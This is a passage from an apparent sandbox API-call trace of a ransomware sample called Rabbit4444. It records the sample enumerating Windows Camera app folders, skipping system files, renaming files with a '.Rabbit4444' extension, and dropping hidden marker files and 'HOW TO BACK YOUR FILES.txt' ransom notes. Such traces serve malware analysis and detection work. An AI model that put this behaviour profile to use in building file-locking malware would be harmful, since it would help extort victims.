lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0064.166] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15547650450) returned 1 [0064.166] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0064.166] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101518 | out: hHeap=0xe0000) returned 1 [0064.166] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0064.166] CloseHandle (hObject=0x27c) returned 1 [0064.166] CloseHandle (hObject=0x2a0) returned 1 [0064.166] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\Settings\\settings.dat.LOG1.Rabbit4444") returned 114 [0064.166] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\Settings\\settings.dat.LOG1" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscamera_8wekyb3d8bbwe\\settings\\settings.dat.log1"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\Settings\\settings.dat.LOG1.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscamera_8wekyb3d8bbwe\\settings\\settings.dat.log1.rabbit4444"), dwFlags=0x1) returned 1 [0064.167] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xfa728eb2, ftCreationTime.dwHighDateTime=0x1d32721, ftLastAccessTime.dwLowDateTime=0xfa728eb2, ftLastAccessTime.dwHighDateTime=0x1d32721, ftLastWriteTime.dwLowDateTime=0xfa728eb2, ftLastWriteTime.dwHighDateTime=0x1d32721, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 1 [0064.167] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0064.167] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0064.167] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="Rabbit4444.exe") returned 1 [0064.167] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2=".") returned 1 [0064.167] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="..") returned 1 [0064.167] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="windows") returned -1 [0064.167] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="bootmgr") returned 1 [0064.167] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="pagefile.sys") returned 1 [0064.167] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="boot") returned 1 [0064.167] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="ids.txt") returned 1 [0064.167] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="NTUSER.DAT") returned 1 [0064.167] lstrcpyW (in: lpString1=0x130ebe4, lpString2="settings.dat.LOG2" | out: lpString1="settings.dat.LOG2") returned="settings.dat.LOG2" [0064.167] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\Settings\\settings.dat.LOG2", dwFileAttributes=0x22) returned 1 [0064.169] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\Settings\\settings.dat.LOG2", dwFileAttributes=0x6) returned 1 [0064.169] lstrlenW (lpString="settings.dat.LOG2") returned 17 [0064.169] lstrlenW (lpString="Rabbit4444") returned 10 [0064.169] lstrcmpiW (lpString1="s.dat.LOG2", lpString2="Rabbit4444") returned 1 [0064.169] lstrlenW (lpString=".dll") returned 4 [0064.169] lstrcmpiW (lpString1="LOG2", lpString2=".dll") returned 1 [0064.169] lstrlenW (lpString=".lnk") returned 4 [0064.169] lstrcmpiW (lpString1="LOG2", lpString2=".lnk") returned 1 [0064.169] lstrlenW (lpString=".ini") returned 4 [0064.169] lstrcmpiW (lpString1="LOG2", lpString2=".ini") returned 1 [0064.169] lstrlenW (lpString=".sys") returned 4 [0064.169] lstrcmpiW (lpString1="LOG2", lpString2=".sys") returned 1 [0064.169] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xfa728eb2, ftCreationTime.dwHighDateTime=0x1d32721, ftLastAccessTime.dwLowDateTime=0xfa728eb2, ftLastAccessTime.dwHighDateTime=0x1d32721, ftLastWriteTime.dwLowDateTime=0xfa728eb2, ftLastWriteTime.dwHighDateTime=0x1d32721, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 0 [0064.169] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0064.169] lstrcpyW (in: lpString1=0x130ebe4, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0064.169] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\Settings\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscamera_8wekyb3d8bbwe\\settings\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0064.170] CreateFileMappingW (hFile=0x2cc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0064.170] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0064.171] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0064.171] CloseHandle (hObject=0x2a0) returned 1 [0064.171] CloseHandle (hObject=0x2cc) returned 1 [0064.171] GetCurrentThreadId () returned 0xd98 [0064.171] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122228 [0064.171] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\RoamingState", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\RoamingState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\RoamingState" [0064.171] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1229c0 | out: hHeap=0xe0000) returned 1 [0064.171] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122220 | out: hHeap=0xe0000) returned 1 [0064.171] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\RoamingState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\RoamingState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\RoamingState" [0064.171] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\RoamingState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\RoamingState\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\RoamingState\\" [0064.171] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\RoamingState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\RoamingState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\RoamingState\\.BFC0E91B00AE8A0620D3" [0064.171] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\RoamingState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscamera_8wekyb3d8bbwe\\roamingstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2cc [0064.173] WriteFile (in: hFile=0x2cc, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0064.175] FlushFileBuffers (hFile=0x2cc) returned 1 [0064.176] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\RoamingState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0064.176] CloseHandle (hObject=0x2cc) returned 1 [0064.177] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\RoamingState") returned 89 [0064.177] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0064.177] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\RoamingState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x19c767cf, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd17a025b, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef92848b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a10 [0064.177] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.177] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.177] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0064.177] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0064.177] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x19c767cf, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd17a025b, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef92848b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0064.177] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.177] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.177] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0064.177] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0064.177] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0064.177] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef92848b, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef92848b, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef92848b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0064.177] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.177] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0064.178] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef92848b, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef92848b, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef92848b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0064.178] FindClose (in: hFindFile=0x102a10 | out: hFindFile=0x102a10) returned 1 [0064.178] lstrcpyW (in: lpString1=0x130ebec, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0064.178] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\RoamingState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscamera_8wekyb3d8bbwe\\roamingstate\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0064.178] CreateFileMappingW (hFile=0x2cc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0064.179] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0064.179] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0064.179] CloseHandle (hObject=0x2a0) returned 1 [0064.179] CloseHandle (hObject=0x2cc) returned 1 [0064.179] GetCurrentThreadId () returned 0xd98 [0064.179] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122248 [0064.179] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\LocalState", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\LocalState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\LocalState" [0064.179] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123eb8 | out: hHeap=0xe0000) returned 1 [0064.179] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122240 | out: hHeap=0xe0000) returned 1 [0064.179] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\LocalState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\LocalState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\LocalState" [0064.179] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\LocalState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\LocalState\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\LocalState\\" [0064.179] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\LocalState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\LocalState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\LocalState\\.BFC0E91B00AE8A0620D3" [0064.180] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\LocalState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscamera_8wekyb3d8bbwe\\localstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2cc [0064.180] WriteFile (in: hFile=0x2cc, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0064.183] FlushFileBuffers (hFile=0x2cc) returned 1 [0064.183] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\LocalState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0064.184] CloseHandle (hObject=0x2cc) returned 1 [0064.184] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\LocalState") returned 87 [0064.184] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0064.184] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\LocalState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x19c767cf, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd179faf3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef94e792, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1027d0 [0064.185] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.185] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.185] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0064.185] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0064.185] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x19c767cf, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd179faf3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef94e792, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0064.185] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.185] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.185] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0064.185] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0064.185] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0064.185] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef94e792, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef94e792, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef94e792, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0064.185] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.185] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0064.185] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef94e792, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef94e792, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef94e792, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0064.185] FindClose (in: hFindFile=0x1027d0 | out: hFindFile=0x1027d0) returned 1 [0064.185] lstrcpyW (in: lpString1=0x130ebe8, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0064.185] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\LocalState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscamera_8wekyb3d8bbwe\\localstate\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0064.186] CreateFileMappingW (hFile=0x2cc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0064.186] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0064.186] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0064.186] CloseHandle (hObject=0x2a0) returned 1 [0064.186] CloseHandle (hObject=0x2cc) returned 1 [0064.186] GetCurrentThreadId () returned 0xd98 [0064.186] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122348 [0064.186] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\LocalCache", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\LocalCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\LocalCache" [0064.186] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123e00 | out: hHeap=0xe0000) returned 1 [0064.186] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122340 | out: hHeap=0xe0000) returned 1 [0064.186] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\LocalCache" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\LocalCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\LocalCache" [0064.186] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\LocalCache", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\LocalCache\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\LocalCache\\" [0064.186] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\LocalCache\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\LocalCache\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\LocalCache\\.BFC0E91B00AE8A0620D3" [0064.187] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\LocalCache\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscamera_8wekyb3d8bbwe\\localcache\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2cc [0064.187] WriteFile (in: hFile=0x2cc, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0064.190] FlushFileBuffers (hFile=0x2cc) returned 1 [0064.191] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\LocalCache\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0064.191] CloseHandle (hObject=0x2cc) returned 1 [0064.192] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\LocalCache") returned 87 [0064.192] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0064.192] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\LocalCache\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x19c9ca37, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd179f2f3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef94e792, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1028d0 [0064.192] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.192] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.192] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0064.192] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0064.192] FindNextFileW (in: 